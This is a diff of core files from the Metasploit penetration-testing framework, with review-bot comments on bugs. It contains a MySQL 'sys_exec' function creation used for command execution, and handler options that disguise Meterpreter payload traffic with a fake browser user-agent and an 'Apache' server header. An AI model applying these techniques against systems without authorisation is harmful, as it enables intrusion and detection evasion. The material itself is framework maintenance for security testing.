def mysql_drop_and_create_sys_exec(soname)
- mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
- mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
+ res = mysql_query("DROP FUNCTION IF EXISTS sys_exec") # Already checked, actually
+ return false if res.nil?
+
+ res = mysql_query("CREATE FUNCTION sys_exec RETURNS int SONAME '#{soname}'")
+ return false if res.nil?
+
return true
end
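Review bot: `return false if res.nil?` treats a nil result as failure, but `mysql_query` returns whatever the handle's `query` returns, and for statements with no result set (DROP FUNCTION, CREATE FUNCTION) that may itself be nil on success. This should be confirmed against the RbMysql version in use; if it holds, the method now always returns false. Telling an error apart from an empty result needs `mysql_query` to signal errors with a distinct value, for example `return false` in its rescue branches, rather than reusing nil.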
diff --git a/lib/msf/core/exploit/ndmp.rb b/lib/msf/core/exploit/ndmp.rb
index 7ecb32deb7..420ed14c51 100644
--- a/lib/msf/core/exploit/ndmp.rb
+++ b/lib/msf/core/exploit/ndmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/ntlm.rb b/lib/msf/core/exploit/ntlm.rb
index e419063dcf..986c70ef7f 100644
--- a/lib/msf/core/exploit/ntlm.rb
+++ b/lib/msf/core/exploit/ntlm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/crypt'
require 'rex/proto/ntlm/base'
diff --git a/lib/msf/core/exploit/omelet.rb b/lib/msf/core/exploit/omelet.rb
index 6d11e93f63..41d7905fd4 100644
--- a/lib/msf/core/exploit/omelet.rb
+++ b/lib/msf/core/exploit/omelet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/exploitation/omelet'
diff --git a/lib/msf/core/exploit/oracle.rb b/lib/msf/core/exploit/oracle.rb
index 7b407b8f06..4ea80af5d6 100644
--- a/lib/msf/core/exploit/oracle.rb
+++ b/lib/msf/core/exploit/oracle.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This module provides methods for communicating with a host running oracle.
diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb
index 112cff562b..630d8dc579 100644
--- a/lib/msf/core/exploit/pdf.rb
+++ b/lib/msf/core/exploit/pdf.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/pdf_parse.rb b/lib/msf/core/exploit/pdf_parse.rb
index 2e0ad8f2ea..5c6b83662b 100644
--- a/lib/msf/core/exploit/pdf_parse.rb
+++ b/lib/msf/core/exploit/pdf_parse.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This module provides methods for parseing and interacting
@@ -34,7 +35,9 @@ module Exploit::PDF_Parse
def trailer_parse(xref_trailer)
trailer = Hash.new()
- trailer["Size"] = xref_trailer.match(/Size (\d+)/m)[1]
+ if match = xref_trailer.match(/Size (\d+)/m)
+ trailer['Size'] = match[1]
+ end
if match = xref_trailer.match(/Root (\d+ \d)/m)
trailer["Root"] = match[1]
diff --git a/lib/msf/core/exploit/pop2.rb b/lib/msf/core/exploit/pop2.rb
index 4e115efda6..e59e65a0f1 100644
--- a/lib/msf/core/exploit/pop2.rb
+++ b/lib/msf/core/exploit/pop2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb
index decd9946d1..fa0b32f3fd 100644
--- a/lib/msf/core/exploit/postgres.rb
+++ b/lib/msf/core/exploit/postgres.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb
index 997cd7a445..3681c0f2bf 100644
--- a/lib/msf/core/exploit/riff.rb
+++ b/lib/msf/core/exploit/riff.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/seh.rb b/lib/msf/core/exploit/seh.rb
index a78db06d00..cd701eb291 100644
--- a/lib/msf/core/exploit/seh.rb
+++ b/lib/msf/core/exploit/seh.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/exploitation/seh'
module Msf
diff --git a/lib/msf/core/exploit/seh.rb.ut.rb b/lib/msf/core/exploit/seh.rb.ut.rb
index d01d1313e0..54d668bdc5 100644
--- a/lib/msf/core/exploit/seh.rb.ut.rb
+++ b/lib/msf/core/exploit/seh.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb
index 03f13e46b9..00f17808c1 100644
--- a/lib/msf/core/exploit/smb.rb
+++ b/lib/msf/core/exploit/smb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/smb'
require 'rex/proto/ntlm'
require 'rex/proto/dcerpc'
diff --git a/lib/msf/core/exploit/smtp.rb b/lib/msf/core/exploit/smtp.rb
index 398d3c5661..a25ecae7b3 100644
--- a/lib/msf/core/exploit/smtp.rb
+++ b/lib/msf/core/exploit/smtp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb
index fdd1440ee7..fb6dfb8c43 100644
--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
require 'msf/core/exploit/tcp'
diff --git a/lib/msf/core/exploit/snmp.rb b/lib/msf/core/exploit/snmp.rb
index 2cbfe6b386..b7d0bb70a1 100644
--- a/lib/msf/core/exploit/snmp.rb
+++ b/lib/msf/core/exploit/snmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'snmp'
diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb
index 2ab3d1c103..f7d219fadc 100644
--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/sunrpc'
module Msf
diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb
index 6dfab710cb..3be4985d3b 100644
--- a/lib/msf/core/exploit/tcp.rb
+++ b/lib/msf/core/exploit/tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module EvasiveTCP
diff --git a/lib/msf/core/exploit/tcp.rb.ut.rb b/lib/msf/core/exploit/tcp.rb.ut.rb
index 2e78671765..e8803fe043 100644
--- a/lib/msf/core/exploit/tcp.rb.ut.rb
+++ b/lib/msf/core/exploit/tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb
index b06beda489..8a7655055f 100644
--- a/lib/msf/core/exploit/telnet.rb
+++ b/lib/msf/core/exploit/telnet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb
index 300b2553af..feb197e9ec 100644
--- a/lib/msf/core/exploit/tftp.rb
+++ b/lib/msf/core/exploit/tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/tns.rb b/lib/msf/core/exploit/tns.rb
index 863f47664e..c7ba4ec736 100644
--- a/lib/msf/core/exploit/tns.rb
+++ b/lib/msf/core/exploit/tns.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb
index c2308d230c..fb3d046ea7 100644
--- a/lib/msf/core/exploit/udp.rb
+++ b/lib/msf/core/exploit/udp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/exploit/vim_soap.rb b/lib/msf/core/exploit/vim_soap.rb
index c3e130adb5..5a89d74ae3 100644
--- a/lib/msf/core/exploit/vim_soap.rb
+++ b/lib/msf/core/exploit/vim_soap.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Exploit::Remote::VIMSoap
diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb
index 5bf37636ed..1961b8c1f3 100644
--- a/lib/msf/core/exploit/wbemexec.rb
+++ b/lib/msf/core/exploit/wbemexec.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/exploit/wdbrpc.rb b/lib/msf/core/exploit/wdbrpc.rb
index ce4e0dfc6a..b1cbddd3f4 100644
--- a/lib/msf/core/exploit/wdbrpc.rb
+++ b/lib/msf/core/exploit/wdbrpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit/wdbrpc_client.rb b/lib/msf/core/exploit/wdbrpc_client.rb
index 95ec460065..d6f62b046f 100644
--- a/lib/msf/core/exploit/wdbrpc_client.rb
+++ b/lib/msf/core/exploit/wdbrpc_client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb
index 51fed57f76..aa9b272cf6 100644
--- a/lib/msf/core/exploit_driver.rb
+++ b/lib/msf/core/exploit_driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
@@ -204,6 +205,7 @@ protected
exploit.exploit
rescue ::Exception => e
+
if [::RuntimeError, ::Interrupt].include?(e.class)
# Wait for session, but don't wait long.
delay = 0.01
@@ -211,16 +213,77 @@ protected
# Build a user-friendly error message
msg = "#{e}"
- msg << "#{e.class}" if msg.empty?
+ unless e.class == Msf::Exploit::Failed
+ msg = "#{e.class} #{e}"
+ end
+
+ exploit.error = e
+
+ # Record the detailed reason
+ exploit.fail_detail ||= e.to_s
+
+ case e.class
+ when Msf::Exploit::Complete
+ # Nothing to show in this case
+ return
+
+ when Msf::Exploit::Failed
+ exploit.print_error("Exploit aborted due to failure: #{exploit.fail_reason}: #{msg}")
+
+ # The caller should have already set exploit.fail_reason
+ if exploit.fail_reason == Msf::Exploit::Failure::None
+ exploit.fail_reason = Msf::Exploit::Failure::Unknown
+ end
+
+ when Rex::ConnectionError
+ exploit.fail_reason = Msf::Exploit::Failure::Unreachable
+ exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
+ elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+ dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+
+ when Timeout::Error
+ exploit.fail_reason = Msf::Exploit::Failure::TimeoutExpired
+ exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
+ elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+ dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+ else
+
+ # Compare as a string since not all error classes may be loaded
+ case msg
+ when /access.denied|Login Failed/i # Covers SMB as well as some generic errors
+ exploit.fail_reason = Msf::Exploit::Failure::NoAccess
+ when /connection reset/i
+ exploit.fail_reason = Msf::Exploit::Failure::Disconnected
+ when /connection timed out|SSL_connect|unreachable/i
+ exploit.fail_reason = Msf::Exploit::Failure::Unreachable
+ when /unable.*target/i
+ exploit.fail_reason = Msf::Exploit::Failure::NoTarget
+ when /execution expired/i
+ exploit.fail_reason = Msf::Exploit::Failure::TimeoutExpired
+ when /(doesn.t|not).*vulnerable|may.*patched/i
+ exploit.fail_reason = Msf::Exploit::Failure::NotVulnerable
+ end
+
+ # The caller should have already set exploit.fail_reason
+ if exploit.fail_reason == Msf::Exploit::Failure::None
+ exploit.fail_reason = Msf::Exploit::Failure::Unknown
+ end
+
+ if exploit.fail_reason == Msf::Exploit::Failure::Unknown
+ exploit.print_error("Exploit failed: #{msg}")
+ else
+ exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
+ end
+
+ elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+ dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+ end
# Record the error to various places
exploit.framework.events.on_module_error(exploit, msg)
- exploit.print_error("Exploit exception: #{msg}")
- exploit.error = msg
- # Log a more verbose version
- elog("Exploit exception (#{exploit.refname}): #{e.class}: #{e}", 'core', LEV_0)
- dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
+ # Report the failure (and attempt) in the database
+ exploit.report_failure
end
# Wait the payload to acquire a session if this isn't a passive-style
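Review bot: `case e.class` compares with `===`, and `Msf::Exploit::Failed === e.class` asks whether the Class object is an instance of `Failed`, which is always false. Every exception therefore falls through to the `else` branch, and the `Complete`, `Failed`, `Rex::ConnectionError` and `Timeout::Error` arms are dead code. Switching on the exception itself, `case e`, makes them match and also covers subclasses. `exploit.error` now holds the exception object rather than the message string, which callers that print it may not expect. The rescue block starts outside this hunk.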
@@ -235,6 +298,15 @@ protected
# Don't let interrupt pass upward
end
end
+
+ return self.session if self.session
+
+ unless exploit.fail_reason
+ exploit.fail_reason = Msf::Exploit::Failure::PayloadFailed
+ exploit.fail_detail = "No session created"
+ exploit.report_failure
+ end
+
end
#
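Review bot: `unless exploit.fail_reason` can never be true, because the constructor change in exploit.rb initialises `fail_reason` to `Failure::None`, the string 'none', which is truthy in Ruby. The PayloadFailed record for a run that produced no session is therefore never written. Compare against the sentinel instead: `if exploit.fail_reason == Msf::Exploit::Failure::None`. The enclosing method starts outside the hunk.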
diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index fa04929615..3f363dbaf9 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/util'
diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb
index 79161f31de..c00fd4c40a 100644
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb
index e2267b650d..4122aa3592 100644
--- a/lib/msf/core/handler/bind_tcp.rb
+++ b/lib/msf/core/handler/bind_tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/handler/bind_tcp.rb.ut.rb b/lib/msf/core/handler/bind_tcp.rb.ut.rb
index 4293d12649..436853974c 100644
--- a/lib/msf/core/handler/bind_tcp.rb.ut.rb
+++ b/lib/msf/core/handler/bind_tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/handler/find_port.rb b/lib/msf/core/handler/find_port.rb
index 5bdb725eae..d8e54ac16c 100644
--- a/lib/msf/core/handler/find_port.rb
+++ b/lib/msf/core/handler/find_port.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/handler/find_shell.rb b/lib/msf/core/handler/find_shell.rb
index 11977d8c18..96ada7a9d3 100644
--- a/lib/msf/core/handler/find_shell.rb
+++ b/lib/msf/core/handler/find_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/find_port'
module Msf
diff --git a/lib/msf/core/handler/find_tag.rb b/lib/msf/core/handler/find_tag.rb
index d3c165d7f3..5bd37eae27 100644
--- a/lib/msf/core/handler/find_tag.rb
+++ b/lib/msf/core/handler/find_tag.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/find_port'
module Msf
diff --git a/lib/msf/core/handler/find_tty.rb b/lib/msf/core/handler/find_tty.rb
index 03b8506689..36ffaa5d42 100644
--- a/lib/msf/core/handler/find_tty.rb
+++ b/lib/msf/core/handler/find_tty.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/find_port'
module Msf
diff --git a/lib/msf/core/handler/none.rb b/lib/msf/core/handler/none.rb
index 61ec556865..17a40f67ff 100644
--- a/lib/msf/core/handler/none.rb
+++ b/lib/msf/core/handler/none.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 62232a74ff..4d525992f9 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
@@ -92,14 +93,16 @@ module ReverseHttp
[
OptString.new('LHOST', [ true, "The local listener hostname" ]),
OptPort.new('LPORT', [ true, "The local listener port", 8443 ])
- ], Msf::Handler::ReverseHttps)
+ ], Msf::Handler::ReverseHttp)
register_advanced_options(
[
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
- OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcible shut down', (24*3600*7)]),
- OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300])
- ], Msf::Handler::ReverseHttps)
+ OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', (24*3600*7)]),
+ OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]),
+ OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
+ OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ])
+ ], Msf::Handler::ReverseHttp)
end
#
@@ -132,6 +135,8 @@ module ReverseHttp
},
comm
)
+
+ self.service.server_name = datastore['MeterpreterServerName']
# Create a reference to ourselves
obj = self
@@ -239,7 +244,15 @@ protected
blob = obj.stage_payload
- # Replace the transport string first (TRANSPORT_SOCKET_SSL
+ # Replace the user agent string with our option
+ i = blob.index("METERPRETER_UA\x00")
+ if i
+ str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
+ blob[i, str.length] = str
+ print_status("Patched user-agent at offset #{i}...")
+ end
+
+ # Replace the transport string first (TRANSPORT_SOCKET_SSL)
i = blob.index("METERPRETER_TRANSPORT_SSL")
if i
str = "METERPRETER_TRANSPORT_HTTP\x00"
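Review bot: `datastore['MeterpreterUserAgent'][0,255]` raises NoMethodError when the option is unset, and the registration hunk above declares the option as not required, so clearing it breaks staging at this line. Read it defensively, e.g. `ua = datastore['MeterpreterUserAgent'].to_s`, and skip the patch when `ua` is empty. The write length is also taken from the option rather than from the placeholder: nothing visible shows how many bytes the stage reserves after `METERPRETER_UA\x00`, so the 255 cap should be a named constant with a comment tying it to that field size. The same lines are added to reverse_https.rb later in this diff, and the enclosing block continues past this hunk.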
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index 8dacb999e8..fa64753c62 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
@@ -98,8 +99,10 @@ module ReverseHttps
register_advanced_options(
[
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
- OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcible shut down', (24*3600*7)]),
- OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300])
+ OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', (24*3600*7)]),
+ OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]),
+ OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
+ OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ])
], Msf::Handler::ReverseHttps)
end
@@ -135,6 +138,8 @@ module ReverseHttps
datastore['SSLCert']
)
+ self.service.server_name = datastore['MeterpreterServerName']
+
# Create a reference to ourselves
obj = self
@@ -240,6 +245,15 @@ protected
blob = obj.stage_payload
+ # Replace the user agent string with our option
+ i = blob.index("METERPRETER_UA\x00")
+ if i
+ str = datastore['MeterpreterUserAgent'][0,255] + "\x00"
+ blob[i, str.length] = str
+ print_status("Patched user-agent at offset #{i}...")
+ end
+
+
# Replace the transport string first (TRANSPORT_SOCKET_SSL
i = blob.index("METERPRETER_TRANSPORT_SSL")
if i
diff --git a/lib/msf/core/handler/reverse_ipv6_http.rb b/lib/msf/core/handler/reverse_ipv6_http.rb
index ef6ae91f99..d222660d62 100644
--- a/lib/msf/core/handler/reverse_ipv6_http.rb
+++ b/lib/msf/core/handler/reverse_ipv6_http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/reverse_http'
module Msf
diff --git a/lib/msf/core/handler/reverse_ipv6_https.rb b/lib/msf/core/handler/reverse_ipv6_https.rb
index dff065045b..19cf733d04 100644
--- a/lib/msf/core/handler/reverse_ipv6_https.rb
+++ b/lib/msf/core/handler/reverse_ipv6_https.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/handler/reverse_https'
module Msf
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index adbc62c954..0604b98d6f 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'thread'
diff --git a/lib/msf/core/handler/reverse_tcp.rb.ut.rb b/lib/msf/core/handler/reverse_tcp.rb.ut.rb
index 0398354ff7..087a244bf5 100644
--- a/lib/msf/core/handler/reverse_tcp.rb.ut.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/handler/reverse_tcp_allports.rb b/lib/msf/core/handler/reverse_tcp_allports.rb
index 120cc52997..1ce70ad0bd 100644
--- a/lib/msf/core/handler/reverse_tcp_allports.rb
+++ b/lib/msf/core/handler/reverse_tcp_allports.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
diff --git a/lib/msf/core/handler/reverse_tcp_double.rb b/lib/msf/core/handler/reverse_tcp_double.rb
index a77b25bc9e..b4afe1914b 100644
--- a/lib/msf/core/handler/reverse_tcp_double.rb
+++ b/lib/msf/core/handler/reverse_tcp_double.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Handler
diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb
index ce5093c9ec..5ed09db4fc 100644
--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb
index d13e2ed410..05265a6bbe 100644
--- a/lib/msf/core/module/author.rb
+++ b/lib/msf/core/module/author.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/author.rb.ut.rb b/lib/msf/core/module/author.rb.ut.rb
index 207d4c96ad..89785a4d67 100644
--- a/lib/msf/core/module/author.rb.ut.rb
+++ b/lib/msf/core/module/author.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module/auxiliary_action.rb b/lib/msf/core/module/auxiliary_action.rb
index 44ee3fb83b..55086aa190 100644
--- a/lib/msf/core/module/auxiliary_action.rb
+++ b/lib/msf/core/module/auxiliary_action.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/has_actions.rb b/lib/msf/core/module/has_actions.rb
index 6fda586005..9745ae1c47 100644
--- a/lib/msf/core/module/has_actions.rb
+++ b/lib/msf/core/module/has_actions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/module/auxiliary_action'
module Msf::Module::HasActions
diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb
index e1a29847a5..89f29ae7e2 100644
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'abbrev'
#
diff --git a/lib/msf/core/module/platform_list.rb b/lib/msf/core/module/platform_list.rb
index a899854855..64fa68fe61 100644
--- a/lib/msf/core/module/platform_list.rb
+++ b/lib/msf/core/module/platform_list.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# This is a helper to a easy way to specify support platforms. It will take a
diff --git a/lib/msf/core/module/platform_list.rb.ut.rb b/lib/msf/core/module/platform_list.rb.ut.rb
index 0f519f7918..d12854830d 100644
--- a/lib/msf/core/module/platform_list.rb.ut.rb
+++ b/lib/msf/core/module/platform_list.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb
index a6ff76be81..55581dc69e 100644
--- a/lib/msf/core/module/reference.rb
+++ b/lib/msf/core/module/reference.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/reference.rb.ut.rb b/lib/msf/core/module/reference.rb.ut.rb
index bd59184dc1..93936dfe13 100644
--- a/lib/msf/core/module/reference.rb.ut.rb
+++ b/lib/msf/core/module/reference.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module/target.rb b/lib/msf/core/module/target.rb
index dfc4409e3c..95b60315a0 100644
--- a/lib/msf/core/module/target.rb
+++ b/lib/msf/core/module/target.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
###
diff --git a/lib/msf/core/module/target.rb.ut.rb b/lib/msf/core/module/target.rb.ut.rb
index 2b5c79f612..5ed119bbe3 100644
--- a/lib/msf/core/module/target.rb.ut.rb
+++ b/lib/msf/core/module/target.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb
index 29e2139998..1b30a31e29 100644
--- a/lib/msf/core/module_manager.rb
+++ b/lib/msf/core/module_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'fastlib'
require 'pathname'
@@ -64,11 +65,6 @@ class ModuleSet < Hash
#
def create(name)
- # if (mod_ambiguous[name])
- # raise Rex::AmbiguousArgumentError.new(name),
- # "The module name #{name} is ambiguous.", caller
- # end
-
klass = get_hash_val(name)
instance = nil
@@ -79,15 +75,19 @@ class ModuleSet < Hash
# type's demand loading until we find one that works for us.
if (module_type.nil?)
MODULE_TYPES.each { |type|
- framework.modules.demand_load_module(type + '/' + name)
+ framework.modules.demand_load_module(type, name)
}
else
- framework.modules.demand_load_module(module_type + '/' + name)
+ framework.modules.demand_load_module(module_type, name)
end
+ recalculate
+
klass = get_hash_val(name)
end
+
+
# If the klass is valid for this name, try to create it
if (klass and klass != SymbolicModule)
instance = klass.new
@@ -105,9 +105,7 @@ class ModuleSet < Hash
# Checks to see if the supplied module name is valid.
#
def valid?(name)
- # If we're using cache, then we need to pre-create an instance of this.
- create(name) if (using_cache)
-
+ create(name)
(self[name]) ? true : false
end
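Review bot: `valid?` now calls `create(name)` unconditionally, so every validity check goes through the demand-load path and, per the visible body of `create`, `klass.new`, only to discard the instance. For names that already resolve to a loaded class that work is unnecessary; something like `create(name) if self[name].nil? || self[name] == SymbolicModule` would keep the demand-load behaviour for placeholders only. If the instantiation is intentional (for example to weed out modules that fail to construct), a comment saying so would help, since the removed comment was the only explanation of why `create` is called here.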
@@ -129,7 +127,7 @@ class ModuleSet < Hash
def each_module(opts = {}, &block)
demand_load_modules
- self.mod_sorted = self.sort if (mod_sorted == nil)
+ self.mod_sorted = self.sort
each_module_list(mod_sorted, opts, &block)
end
@@ -141,7 +139,7 @@ class ModuleSet < Hash
def each_module_ranked(opts = {}, &block)
demand_load_modules
- self.mod_ranked = rank_modules if (mod_ranked == nil)
+ self.mod_ranked = rank_modules
